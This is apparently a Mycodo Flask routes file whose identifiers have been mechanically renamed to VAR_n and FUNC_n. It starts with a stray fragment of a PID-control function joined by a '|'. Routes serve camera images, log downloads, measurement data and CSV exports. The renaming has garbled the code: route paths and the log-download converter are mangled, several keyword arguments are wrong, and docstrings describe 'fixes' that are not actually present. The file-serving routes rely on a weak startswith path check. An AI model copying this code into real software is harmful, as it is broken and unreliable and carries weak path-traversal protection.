        pid.is_held = False
        pid.save()
        _, return_str = control.controller_deactivate(pid.unique_id)
        return return_str

    if VAR_24 == 'pause_pid':
        pid.is_paused = True
        pid.save()
        if pid.is_activated:
            return control.pid_pause(pid.unique_id)
        return "PID Paused (Note: PID is not currently active)"

    if VAR_24 == 'hold_pid':
        pid.is_held = True
        pid.save()
        if pid.is_activated:
            return control.pid_hold(pid.unique_id)
        return "PID Held (Note: PID is not currently active)"

    if VAR_24 == 'resume_pid':
        pid.is_held = False
        pid.is_paused = False
        pid.save()
        if pid.is_activated:
            return control.pid_resume(pid.unique_id)
        return "PID Resumed (Note: PID is not currently active)"

    if 'set_setpoint_pid' in VAR_24:
        # Action format: 'set_setpoint_pid|<new_setpoint>'
        new_setpoint = VAR_24.split('|')[1]
        pid.setpoint = new_setpoint
        pid.save()
        if pid.is_activated:
            return control.pid_set(pid.unique_id, 'setpoint', float(new_setpoint))
        return "PID Setpoint changed (Note: PID is not currently active)"
|
import calendar
import datetime
import logging
import os
import subprocess
import time
from importlib import import_module

import flask_login
from dateutil.parser import parse as date_parse
from flask import Response
from flask import flash
from flask import jsonify
from flask import redirect
from flask import send_file
from flask import send_from_directory
from flask import url_for
from flask.blueprints import Blueprint
from flask_babel import gettext
from flask_limiter import Limiter
from influxdb import InfluxDBClient
from sqlalchemy import and_

from mycodo.config import DOCKER_CONTAINER
from mycodo.config import INFLUXDB_DATABASE
from mycodo.config import INFLUXDB_HOST
from mycodo.config import INFLUXDB_PASSWORD
from mycodo.config import INFLUXDB_PORT
from mycodo.config import INFLUXDB_USER
from mycodo.config import INSTALL_DIRECTORY
from mycodo.config import LOG_PATH
from mycodo.config import PATH_CAMERAS
from mycodo.config import PATH_NOTE_ATTACHMENTS
from mycodo.databases.models import Camera
from mycodo.databases.models import Conversion
from mycodo.databases.models import DeviceMeasurements
from mycodo.databases.models import Input
from mycodo.databases.models import Math
from mycodo.databases.models import NoteTags
from mycodo.databases.models import Notes
from mycodo.databases.models import Output
from mycodo.databases.models import OutputChannel
from mycodo.databases.models import PID
from mycodo.devices.camera import camera_record
from mycodo.mycodo_client import DaemonControl
from mycodo.mycodo_flask.routes_authentication import clear_cookie_auth
from mycodo.mycodo_flask.utils import utils_general
from mycodo.mycodo_flask.utils.utils_general import get_ip_address
from mycodo.mycodo_flask.utils.utils_output import get_all_output_states
from mycodo.utils.database import db_retrieve_table
from mycodo.utils.image import generate_thermal_image_from_pixels
from mycodo.utils.influx import influx_time_str_to_milliseconds
from mycodo.utils.influx import query_string
from mycodo.utils.system_pi import assure_path_exists
from mycodo.utils.system_pi import is_int
from mycodo.utils.system_pi import return_measurement_info
from mycodo.utils.system_pi import str_is_float
# Blueprint collecting the general-purpose routes of the frontend;
# static files and templates resolve relative to this package.
VAR_0 = Blueprint('routes_general',
                  __name__,
                  static_folder='../static',
                  template_folder='../templates')
# Module-level logger for this blueprint
VAR_1 = logging.getLogger(__name__)
# Rate limiter keyed on the requesting client's IP address
VAR_2 = Limiter(key_func=get_ip_address)
@VAR_0.route('/')
def FUNC_0():
    """Redirect to the user's configured landing page (default: Live)."""
    try:
        if flask_login.current_user.is_authenticated:
            endpoints = {
                'live': 'routes_page.page_live',
                'dashboard': 'routes_dashboard.page_dashboard_default',
                'info': 'routes_page.page_info',
            }
            target = endpoints.get(flask_login.current_user.landing_page)
            if target:
                return redirect(url_for(target))
        return redirect(url_for('routes_page.page_live'))
    except:
        VAR_1.error("User may not be logged in. Clearing cookie auth.")
        return clear_cookie_auth()
@VAR_0.route('/index_page')
def FUNC_1():
    """Redirect to the user's configured index page, falling back to the
    landing page when none (or 'landing') is configured."""
    try:
        configured = flask_login.current_user.index_page
        if not configured or configured == 'landing':
            return FUNC_0()
        if flask_login.current_user.is_authenticated:
            endpoints = {
                'live': 'routes_page.page_live',
                'dashboard': 'routes_dashboard.page_dashboard_default',
                'info': 'routes_page.page_info',
            }
            target = endpoints.get(configured)
            if target:
                return redirect(url_for(target))
        return redirect(url_for('routes_page.page_live'))
    except:
        VAR_1.error("User may not be logged in. Clearing cookie auth.")
        return clear_cookie_auth()
@VAR_0.route('/settings', methods=('GET', 'POST'))
@flask_login.login_required
def FUNC_2():
    """Send the bare /settings URL to the general settings page."""
    settings_page = 'settings/general'
    return redirect(settings_page)
@VAR_0.route('/note_attachment/<VAR_3>')
@flask_login.login_required
def FUNC_3(VAR_3):
    """Serve a note attachment file as a download."""
    attachment_path = os.path.join(PATH_NOTE_ATTACHMENTS, VAR_3)
    if attachment_path is None:
        return
    try:
        # Path-traversal guard: only serve files that resolve inside
        # the attachments directory.
        if os.path.abspath(attachment_path).startswith(PATH_NOTE_ATTACHMENTS):
            return send_file(attachment_path, as_attachment=True)
    except Exception:
        VAR_1.exception("Send note attachment")
@VAR_0.route('/VAR_8/<VAR_4>/<VAR_5>/<VAR_3>')
@flask_login.login_required
def FUNC_4(VAR_4, VAR_5, VAR_3):
    """Serve a camera image (still or timelapse frame) as JPEG.

    VAR_4: camera unique id; VAR_5: image type ('still' or 'timelapse');
    VAR_3: file name of the requested image.

    Fix: the generator that lists servable files referenced the
    undefined name 'files' (NameError at runtime).
    """
    VAR_8 = Camera.query.filter(Camera.unique_id == VAR_4).first()
    VAR_33 = assure_path_exists(
        os.path.join(PATH_CAMERAS, '{uid}'.format(uid=VAR_8.unique_id)))

    # Resolve the directory holding this image type; a custom path on
    # the camera record overrides the default location.
    if VAR_5 == 'still':
        if VAR_8.path_still:
            VAR_34 = VAR_8.path_still
        else:
            VAR_34 = os.path.join(VAR_33, VAR_5)
    elif VAR_5 == 'timelapse':
        if VAR_8.path_timelapse:
            VAR_34 = VAR_8.path_timelapse
        else:
            VAR_34 = os.path.join(VAR_33, VAR_5)
    else:
        return "Unknown Image Type"

    if os.path.isdir(VAR_34):
        VAR_71 = (VAR_71 for VAR_71 in os.listdir(VAR_34)
                  if os.path.isfile(os.path.join(VAR_34, VAR_71)))
    else:
        VAR_71 = []
    # Only serve a file that actually exists in the directory, and
    # whose resolved path stays inside it (path-traversal guard).
    if VAR_3 in VAR_71:
        VAR_46 = os.path.join(VAR_34, VAR_3)
        if os.path.abspath(VAR_46).startswith(VAR_34):
            return send_file(VAR_46, mimetype='image/jpeg')
    return "Image not found"
@VAR_0.route('/camera_acquire_image/<VAR_6>/<VAR_4>/<VAR_7>')
@flask_login.login_required
def FUNC_5(VAR_6, VAR_4, VAR_7):
    """Capture a photo and return its filename and timestamp as JSON.

    VAR_6: 'new' (permanent file) or 'tmp' (reusable temp file).
    VAR_4: camera unique id.
    VAR_7: maximum acceptable age of the image in seconds.

    Fix: the keyword value previously referenced the undefined name
    'tmp_filename' (NameError at runtime); it must forward VAR_72.
    """
    if VAR_6 == 'new':
        VAR_72 = None
    elif VAR_6 == 'tmp':
        VAR_72 = '{id}_tmp.jpg'.format(id=VAR_4)
    else:
        return
    VAR_34, VAR_3 = camera_record('photo', VAR_4, VAR_72=VAR_72)
    VAR_35 = os.path.join(VAR_34, VAR_3)
    # Reject captures older than the allowed age window
    VAR_36 = datetime.datetime.now() - datetime.timedelta(seconds=int(VAR_7))
    VAR_16 = os.path.getctime(VAR_35)
    if datetime.datetime.fromtimestamp(VAR_16) > VAR_36:
        VAR_73 = datetime.datetime.fromtimestamp(VAR_16).strftime('%Y-%m-%d %H:%M:%S')
        VAR_74 = '["{}","{}"]'.format(VAR_3, VAR_73)
    else:
        VAR_74 = '["max_age_exceeded"]'
    return Response(VAR_74, mimetype='text/json')
@VAR_0.route('/camera_latest_timelapse/<VAR_4>/<VAR_7>')
@flask_login.login_required
def FUNC_6(VAR_4, VAR_7):
    """Return the newest timelapse frame's name and timestamp as JSON,
    or an error token when the file is missing or too old."""
    camera = Camera.query.filter(
        Camera.unique_id == VAR_4).first()
    _, timelapse_path = utils_general.get_camera_paths(camera)
    latest_file = os.path.join(timelapse_path, str(camera.timelapse_last_file))

    if camera.timelapse_last_file is not None and os.path.exists(latest_file):
        oldest_allowed = datetime.datetime.now() - datetime.timedelta(seconds=int(VAR_7))
        if datetime.datetime.fromtimestamp(camera.timelapse_last_ts) > oldest_allowed:
            ts_text = datetime.datetime.fromtimestamp(camera.timelapse_last_ts).strftime("%Y-%m-%d %H:%M:%S")
            payload = '["{}","{}"]'.format(camera.timelapse_last_file, ts_text)
        else:
            payload = '["max_age_exceeded"]'
    else:
        payload = '["file_not_found"]'
    return Response(payload, mimetype='text/json')
def FUNC_7(VAR_8):
    """Yield an endless MJPEG multipart stream of frames from a camera.

    VAR_8: object exposing get_frame() that returns JPEG bytes.

    Fix: the boundary literal was mangled to b'--VAR_75'; it must be
    b'--frame' to match the 'boundary=frame' declared by the streaming
    response in FUNC_8, otherwise clients cannot parse the stream.
    """
    while True:
        VAR_75 = VAR_8.get_frame()
        yield (b'--frame\r\n'
               b'Content-Type: image/jpeg\r\n\r\n' + VAR_75 + b'\r\n')
@VAR_0.route('/FUNC_8/<VAR_9>')
@flask_login.login_required
def FUNC_8(VAR_9):
    """Stream a camera's frames as an MJPEG multipart HTTP response.

    Fix: the camera constructor keyword value previously referenced the
    undefined name 'unique_id' (NameError at runtime); it must forward
    this route's VAR_9.
    """
    VAR_40 = Camera.query.filter(Camera.unique_id == VAR_9).first()
    # Import the backend module matching the camera's configured library
    VAR_41 = import_module('mycodo.mycodo_flask.camera.camera_' + VAR_40.library).Camera
    VAR_41.set_camera_options(VAR_40)
    return Response(FUNC_7(VAR_41(VAR_9=VAR_9)),
                    mimetype='multipart/x-mixed-replace; boundary=frame')
@VAR_0.route('/outputstate')
@flask_login.login_required
def FUNC_9():
    """Return the current state of every output as JSON."""
    all_states = get_all_output_states()
    return jsonify(all_states)
@VAR_0.route('/outputstate_unique_id/<VAR_9>/<VAR_10>')
@flask_login.login_required
def FUNC_10(VAR_9, VAR_10):
    """Return the state of one output channel as JSON."""
    out_channel = OutputChannel.query.filter(
        OutputChannel.unique_id == VAR_10).first()
    daemon = DaemonControl()
    state = daemon.output_state(VAR_9, out_channel.channel)
    return jsonify(state)
@VAR_0.route('/FUNC_11/<VAR_9>')
@flask_login.login_required
def FUNC_11(VAR_9):
    """Ask the daemon to execute a widget's code; return its output as JSON."""
    daemon = DaemonControl()
    widget_output = daemon.widget_execute(VAR_9)
    return jsonify(widget_output)
@VAR_0.route('/time')
@flask_login.login_required
def FUNC_12():
    """Return the current local time formatted 'MM/DD HH:MM' as JSON."""
    now = datetime.datetime.now()
    return jsonify(now.strftime('%m/%d %H:%M'))
@VAR_0.route('/dl/<VAR_11>/<VAR_34:VAR_3>')
@flask_login.login_required
def FUNC_13(VAR_11, VAR_3):
    """Serve a log file as a download; any other type yields HTTP 204."""
    if VAR_11 != 'log':
        return '', 204
    return send_from_directory(LOG_PATH, VAR_3, as_attachment=True)
@VAR_0.route('/last/<VAR_9>/<VAR_12>/<VAR_13>/<VAR_14>')
@flask_login.login_required
def FUNC_14(VAR_9, VAR_12, VAR_13, VAR_14):
    """Return the last measurement as '[epoch_ms, value]' text/json.

    VAR_9: device unique id.
    VAR_12: device type ('input', 'math', 'function', 'output', 'pid').
    VAR_13: measurement unique id.
    VAR_14: look-back window in seconds ('0' = unbounded).
    Responds HTTP 204 on any failure or unknown device type.

    Fixes: the query channel keyword previously referenced the
    undefined name 'channel' (NameError at runtime); an explicit
    trailing 204 replaces the implicit None return for unknown types.
    """
    if not str_is_float(VAR_14):
        return '', 204
    if VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
        VAR_47 = InfluxDBClient(
            INFLUXDB_HOST,
            INFLUXDB_PORT,
            INFLUXDB_USER,
            INFLUXDB_PASSWORD,
            INFLUXDB_DATABASE)
        if VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
            VAR_83 = DeviceMeasurements.query.filter(
                DeviceMeasurements.unique_id == VAR_13).first()
        else:
            return '', 204
        if VAR_83:
            VAR_80 = Conversion.query.filter(
                Conversion.unique_id == VAR_83.conversion_id).first()
        else:
            VAR_80 = None
        VAR_22, VAR_21, VAR_29 = return_measurement_info(
            VAR_83, VAR_80)

        # For PID setpoints, report in the units of the PID's input
        if hasattr(VAR_83, 'measurement_type') and VAR_83.measurement_type == 'setpoint':
            VAR_107 = PID.query.filter(PID.unique_id == VAR_83.device_id).first()
            if VAR_107 and ',' in VAR_107.measurement:
                VAR_110 = VAR_107.measurement.split(',')[1]
                VAR_111 = DeviceMeasurements.query.filter(
                    DeviceMeasurements.unique_id == VAR_110).first()
                if VAR_111:
                    VAR_80 = Conversion.query.filter(
                        Conversion.unique_id == VAR_111.conversion_id).first()
                    VAR_37, VAR_21, VAR_29 = return_measurement_info(VAR_111, VAR_80)
        try:
            if VAR_14 != '0':
                VAR_61 = query_string(
                    VAR_21, VAR_9,
                    VAR_83=VAR_29, VAR_22=VAR_22,
                    VAR_94='LAST', past_sec=VAR_14)
            else:
                VAR_61 = query_string(
                    VAR_21, VAR_9,
                    VAR_83=VAR_29, VAR_22=VAR_22,
                    VAR_94='LAST')
            if VAR_61 == 1:
                return '', 204
            VAR_62 = VAR_47.query(VAR_61).raw
            VAR_92 = len(VAR_62['series'][0]['values'])
            VAR_93 = VAR_62['series'][0]['values'][VAR_92 - 1][0]
            VAR_94 = VAR_62['series'][0]['values'][VAR_92 - 1][1]
            VAR_94 = float(VAR_94)
            # Convert the influx timestamp string to epoch milliseconds
            VAR_95 = date_parse(VAR_93)
            VAR_16 = calendar.timegm(VAR_95.timetuple()) * 1000
            VAR_104 = '[{},{}]'.format(VAR_16, VAR_94)
            return Response(VAR_104, mimetype='text/json')
        except KeyError:
            VAR_1.debug("No Data returned form influxdb")
            return '', 204
        except IndexError:
            VAR_1.debug("No Data returned form influxdb")
            return '', 204
        except Exception as e:
            VAR_1.exception("URL for 'last_data' raised and error: "
                            "{err}".format(err=e))
            return '', 204
    # Unknown device type: explicit empty response instead of None
    return '', 204
@VAR_0.route('/past/<VAR_9>/<VAR_12>/<VAR_13>/<VAR_15>')
@flask_login.login_required
def FUNC_15(VAR_9, VAR_12, VAR_13, VAR_15):
    """Return all measurements from the past VAR_15 seconds as JSON.

    VAR_9: device (or note tag) unique id.
    VAR_12: device type ('tag', 'input', 'math', 'function', 'output', 'pid').
    VAR_13: measurement unique id.
    VAR_15: look-back window in seconds.
    Responds HTTP 204 on any failure or when no data is found.

    Fixes: the query channel keyword previously referenced the
    undefined name 'channel' (NameError at runtime); an explicit
    trailing 204 replaces the implicit None return for unknown types.
    """
    if not str_is_float(VAR_15):
        return '', 204
    if VAR_12 == 'tag':
        # Note tags: return [time, name, note] for notes with this tag
        VAR_76 = []
        VAR_77 = NoteTags.query.filter(NoteTags.unique_id == VAR_9).first()
        VAR_78 = Notes.query.filter(
            Notes.date_time >= (datetime.datetime.utcnow() - datetime.timedelta(seconds=int(VAR_15)))).all()
        for each_note in VAR_78:
            if VAR_77.unique_id in each_note.tags.split(','):
                VAR_76.append(
                    [each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
        if VAR_76:
            return jsonify(VAR_76)
        else:
            return '', 204
    elif VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
        VAR_47 = InfluxDBClient(
            INFLUXDB_HOST,
            INFLUXDB_PORT,
            INFLUXDB_USER,
            INFLUXDB_PASSWORD,
            INFLUXDB_DATABASE)
        if VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
            VAR_83 = DeviceMeasurements.query.filter(
                DeviceMeasurements.unique_id == VAR_13).first()
        else:
            VAR_83 = None
        if not VAR_83:
            return "Could not find measurement"
        if VAR_83:
            VAR_80 = Conversion.query.filter(
                Conversion.unique_id == VAR_83.conversion_id).first()
        else:
            VAR_80 = None
        VAR_22, VAR_21, VAR_29 = return_measurement_info(
            VAR_83, VAR_80)

        # For PID setpoints, report in the units of the PID's input
        if hasattr(VAR_83, 'measurement_type') and VAR_83.measurement_type == 'setpoint':
            VAR_107 = PID.query.filter(PID.unique_id == VAR_83.device_id).first()
            if VAR_107 and ',' in VAR_107.measurement:
                VAR_110 = VAR_107.measurement.split(',')[1]
                VAR_111 = DeviceMeasurements.query.filter(
                    DeviceMeasurements.unique_id == VAR_110).first()
                if VAR_111:
                    VAR_80 = Conversion.query.filter(
                        Conversion.unique_id == VAR_111.conversion_id).first()
                    VAR_37, VAR_21, VAR_29 = return_measurement_info(VAR_111, VAR_80)
        try:
            VAR_61 = query_string(
                VAR_21, VAR_9,
                VAR_83=VAR_29,
                VAR_22=VAR_22,
                past_sec=VAR_15)
            if VAR_61 == 1:
                return '', 204
            VAR_62 = VAR_47.query(VAR_61).raw
            if 'series' in VAR_62 and VAR_62['series']:
                return jsonify(VAR_62['series'][0]['values'])
            else:
                return '', 204
        except Exception as e:
            VAR_1.debug("URL for 'past_data' raised and error: "
                        "{err}".format(err=e))
            return '', 204
    # Unknown device type: explicit empty response instead of None
    return '', 204
@VAR_0.route('/generate_thermal_image/<VAR_9>/<VAR_16>')
@flask_login.login_required
def FUNC_16(VAR_9, VAR_16):
    """Render a thermal image from stored channel measurements and serve it.

    VAR_9: unique id of the Input device whose channels hold pixel values.
    VAR_16: epoch timestamp in milliseconds identifying the measurement.

    Reads one value per channel from InfluxDB within a one-second window
    around VAR_16, renders them to an 8x8 JPEG, and returns the file.
    Returns an error string when any channel's value cannot be fetched.
    """
    VAR_44 = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
    # Camera-style storage directory for this device's generated images
    VAR_33 = assure_path_exists(
        os.path.join(PATH_CAMERAS, '{uid}'.format(uid=VAR_9)))
    VAR_3 = 'Still-{uid}-{VAR_106}.jpg'.format(
        uid=VAR_9,
        VAR_106=VAR_44).replace(" ", "_")
    VAR_45 = assure_path_exists(os.path.join(VAR_33, 'thermal'))
    assure_path_exists(VAR_45)
    VAR_46 = os.path.join(VAR_45, VAR_3)  # full path of the output JPEG
    VAR_47 = InfluxDBClient(
        INFLUXDB_HOST,
        INFLUXDB_PORT,
        INFLUXDB_USER,
        INFLUXDB_PASSWORD,
        INFLUXDB_DATABASE)
    VAR_48 = Input.query.filter(Input.unique_id == VAR_9).first()
    VAR_49 = []  # pixel values, one per input channel
    VAR_50 = True  # set False when any channel's value cannot be fetched
    # Convert ms-epoch to a one-second [start, end] window in influx format
    VAR_51 = int(int(VAR_16) / 1000.0)  # Round down
    VAR_52 = VAR_51 + 1  # Round up
    VAR_53 = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(VAR_51))
    VAR_54 = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(VAR_52))
    for each_channel in range(VAR_48.channels):
        VAR_29 = 'channel_{chan}'.format(
            chan=each_channel)
        VAR_61 = query_string(VAR_29, VAR_9,
                              VAR_59=VAR_53,
                              VAR_60=VAR_54)
        if VAR_61 == 1:
            VAR_1.error('Invalid query string')
            VAR_50 = False
        else:
            VAR_62 = VAR_47.query(VAR_61).raw
            if not VAR_62 or 'series' not in VAR_62 or not VAR_62['series']:
                VAR_1.error('No measurements to export in this time period')
                VAR_50 = False
            else:
                # First (only) point recorded within the 1-second window
                VAR_49.append(VAR_62['series'][0]['values'][0][1])
    if VAR_50:
        # 8x8 grid — presumably VAR_48.channels == 64; TODO confirm
        generate_thermal_image_from_pixels(VAR_49, 8, 8, VAR_46)
        return send_file(VAR_46, mimetype='image/jpeg')
    else:
        return "Could not generate image"
@VAR_0.route('/FUNC_17/<VAR_9>/<VAR_13>/<VAR_17>/<VAR_18>')
@flask_login.login_required
def FUNC_17(VAR_9, VAR_13, VAR_17, VAR_18):
    """Export measurement data in a time window as a streamed CSV download.

    VAR_9: unique id of the Output/Input/Math device.
    VAR_13: unique id of the device measurement.
    VAR_17 / VAR_18: start/end epoch seconds (local time).

    Fixes: query keyword values previously referenced the undefined
    names 'channel'/'start_str'/'end_str'/'name' (NameError at
    runtime); the CSV filename literal contained the mangled token
    'VAR_37' in place of '_'; the Content-Disposition header used the
    mangled parameter name 'VAR_3' instead of 'filename'.
    """
    VAR_47 = InfluxDBClient(
        INFLUXDB_HOST,
        INFLUXDB_PORT,
        INFLUXDB_USER,
        INFLUXDB_PASSWORD,
        INFLUXDB_DATABASE, timeout=100)

    # The device may be an Output, Input, or Math controller
    VAR_55 = Output.query.filter(Output.unique_id == VAR_9).first()
    VAR_48 = Input.query.filter(Input.unique_id == VAR_9).first()
    VAR_56 = Math.query.filter(Math.unique_id == VAR_9).first()
    if VAR_55:
        VAR_79 = VAR_55.name
    elif VAR_48:
        VAR_79 = VAR_48.name
    elif VAR_56:
        VAR_79 = VAR_56.name
    else:
        VAR_79 = None

    VAR_57 = DeviceMeasurements.query.filter(
        DeviceMeasurements.unique_id == VAR_13).first()
    if VAR_57:
        VAR_80 = Conversion.query.filter(
            Conversion.unique_id == VAR_57.conversion_id).first()
    else:
        VAR_80 = None
    VAR_22, VAR_21, VAR_29 = return_measurement_info(
        VAR_57, VAR_80)

    # URL timestamps are local time; shift them to UTC for influx
    VAR_58 = datetime.datetime.utcnow() - datetime.datetime.now()
    VAR_51 = datetime.datetime.fromtimestamp(float(VAR_17))
    VAR_51 += VAR_58
    VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
    VAR_52 = datetime.datetime.fromtimestamp(float(VAR_18))
    VAR_52 += VAR_58
    VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')

    VAR_61 = query_string(
        VAR_21, VAR_9,
        VAR_83=VAR_29, VAR_22=VAR_22,
        VAR_59=VAR_59, VAR_60=VAR_60)
    if VAR_61 == 1:
        flash('Invalid query string', 'error')
        return redirect(url_for('routes_page.page_export'))
    VAR_62 = VAR_47.query(VAR_61).raw
    if not VAR_62 or 'series' not in VAR_62 or not VAR_62['series']:
        flash('No measurements to export in this time period', 'error')
        return redirect(url_for('routes_page.page_export'))

    # CSV column headers and the download filename
    VAR_63 = 'timestamp (UTC)'
    VAR_64 = '{VAR_79} {meas} ({id})'.format(
        VAR_79=VAR_79, meas=VAR_29, id=VAR_9)
    VAR_65 = '{id}_{VAR_79}_{meas}.csv'.format(
        id=VAR_9, VAR_79=VAR_79, meas=VAR_29)

    import csv
    from io import StringIO

    def FUNC_26(VAR_66):
        # Stream the CSV one row at a time so memory use stays flat
        VAR_81 = StringIO()
        VAR_82 = csv.writer(VAR_81)
        VAR_82.writerow([VAR_63, VAR_64])
        for csv_line in VAR_66:
            VAR_82.writerow([
                str(csv_line[0][:-4]).replace('T', ' '),
                csv_line[1]
            ])
            VAR_81.seek(0)
            yield VAR_81.read()
            VAR_81.truncate(0)
            VAR_81.seek(0)

    VAR_67 = Response(FUNC_26(VAR_62['series'][0]['values']), mimetype='text/csv')
    VAR_67.headers['Content-Disposition'] = 'attachment; filename="{}"'.format(VAR_65)
    return VAR_67
@VAR_0.route('/async/<VAR_19>/<VAR_20>/<VAR_13>/<VAR_17>/<VAR_18>')
@flask_login.login_required
def FUNC_18(VAR_19, VAR_20, VAR_13, VAR_17, VAR_18):
    """Return asynchronous chart data between two timestamps as JSON.

    VAR_19: device (or note tag) unique id.
    VAR_20: device type ('tag', 'input', 'math', 'function', 'output', 'pid').
    VAR_13: measurement unique id.
    VAR_17 / VAR_18: start/end epoch seconds; '0' = unbounded.

    When more than 700 points fall in the window, the series is
    downsampled with MEAN over computed group intervals. Responds
    HTTP 204 on failure or when no data exists.

    Fixes: query keyword values previously referenced the undefined
    names 'channel'/'start_str'/'end_str' (NameError at runtime); bare
    'except:' clauses narrowed to 'except Exception:'.
    """
    if VAR_20 == 'tag':
        # Note tags: return [time, name, note] rows instead of influx data
        VAR_76 = []
        VAR_77 = NoteTags.query.filter(NoteTags.unique_id == VAR_19).first()
        VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
        if VAR_18 == '0':
            VAR_52 = datetime.datetime.utcnow()
        else:
            VAR_52 = datetime.datetime.utcfromtimestamp(float(VAR_18))
        VAR_78 = Notes.query.filter(
            and_(Notes.date_time >= VAR_51, Notes.date_time <= VAR_52)).all()
        for each_note in VAR_78:
            if VAR_77.unique_id in each_note.tags.split(','):
                VAR_76.append(
                    [each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
        if VAR_76:
            return jsonify(VAR_76)
        else:
            return '', 204

    VAR_47 = InfluxDBClient(
        INFLUXDB_HOST,
        INFLUXDB_PORT,
        INFLUXDB_USER,
        INFLUXDB_PASSWORD,
        INFLUXDB_DATABASE)
    if VAR_20 in ['input', 'math', 'function', 'output', 'pid']:
        VAR_83 = DeviceMeasurements.query.filter(
            DeviceMeasurements.unique_id == VAR_13).first()
    else:
        VAR_83 = None
    if not VAR_83:
        return "Could not find measurement"
    if VAR_83:
        VAR_80 = Conversion.query.filter(
            Conversion.unique_id == VAR_83.conversion_id).first()
    else:
        VAR_80 = None
    VAR_22, VAR_21, VAR_29 = return_measurement_info(
        VAR_83, VAR_80)

    if VAR_17 == '0' and VAR_18 == '0':
        # Unbounded window: count all points, locate earliest timestamp,
        # and end the window at "now".
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_83=VAR_29,
            VAR_22=VAR_22,
            VAR_94='COUNT')
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        VAR_84 = VAR_62['series'][0]['values'][0][1]
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_83=VAR_29,
            VAR_22=VAR_22,
            limit=1)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        try:
            VAR_87 = VAR_62['series'][0]['values'][0][0]
        except Exception:
            return '', 204
        VAR_52 = datetime.datetime.utcnow()
        VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
    elif VAR_17 != '0' and VAR_18 == '0':
        # Bounded start, open end (now)
        VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
        VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        VAR_52 = datetime.datetime.utcnow()
        VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_83=VAR_29,
            VAR_22=VAR_22,
            VAR_94='COUNT',
            VAR_59=VAR_59,
            VAR_60=VAR_60)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        try:
            VAR_84 = VAR_62['series'][0]['values'][0][1]
        except Exception:
            return '', 204
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_83=VAR_29,
            VAR_22=VAR_22,
            VAR_59=VAR_59,
            VAR_60=VAR_60,
            limit=1)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        try:
            VAR_87 = VAR_62['series'][0]['values'][0][0]
        except Exception:
            return '', 204
    else:
        # Fully bounded window
        VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
        VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        VAR_52 = datetime.datetime.utcfromtimestamp(float(VAR_18))
        VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_83=VAR_29,
            VAR_22=VAR_22,
            VAR_94='COUNT',
            VAR_59=VAR_59,
            VAR_60=VAR_60)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        try:
            VAR_84 = VAR_62['series'][0]['values'][0][1]
        except Exception:
            return '', 204
        VAR_61 = query_string(
            VAR_21, VAR_19,
            VAR_83=VAR_29,
            VAR_22=VAR_22,
            VAR_59=VAR_59,
            VAR_60=VAR_60,
            limit=1)
        if VAR_61 == 1:
            return '', 204
        VAR_62 = VAR_47.query(VAR_61).raw
        try:
            VAR_87 = VAR_62['series'][0]['values'][0][0]
        except Exception:
            return '', 204

    # Clamp the window start to the first recorded point
    VAR_51 = datetime.datetime.strptime(
        influx_time_str_to_milliseconds(VAR_87),
        '%Y-%m-%dT%H:%M:%S.%f')
    VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
    VAR_1.debug('Count = {}'.format(VAR_84))
    VAR_1.debug('Start = {}'.format(VAR_51))
    VAR_1.debug('End = {}'.format(VAR_52))
    VAR_68 = (VAR_52 - VAR_51).total_seconds()
    VAR_1.debug('Difference seconds = {}'.format(VAR_68))

    if VAR_84 > 700:
        # Too many points to return raw: downsample with MEAN
        VAR_85 = VAR_68 / VAR_84
        VAR_1.debug('Seconds per point = {}'.format(VAR_85))
        VAR_86 = int(VAR_68 / 700)
        VAR_1.debug('Group seconds = {}'.format(VAR_86))
        try:
            VAR_61 = query_string(
                VAR_21, VAR_19,
                VAR_83=VAR_29,
                VAR_22=VAR_22,
                VAR_94='MEAN',
                VAR_59=VAR_59,
                VAR_60=VAR_60,
                group_sec=VAR_86)
            if VAR_61 == 1:
                return '', 204
            VAR_62 = VAR_47.query(VAR_61).raw
            try:
                return jsonify(VAR_62['series'][0]['values'])
            except Exception:
                return '', 204
        except Exception as e:
            VAR_1.error("URL for 'async_data' raised and error: "
                        "{err}".format(err=e))
            return '', 204
    else:
        try:
            VAR_61 = query_string(
                VAR_21, VAR_19,
                VAR_83=VAR_29,
                VAR_22=VAR_22,
                VAR_59=VAR_59,
                VAR_60=VAR_60)
            if VAR_61 == 1:
                return '', 204
            VAR_62 = VAR_47.query(VAR_61).raw
            return jsonify(VAR_62['series'][0]['values'])
        except Exception as e:
            VAR_1.error("URL for 'async_data' raised and error: "
                        "{err}".format(err=e))
            return '', 204
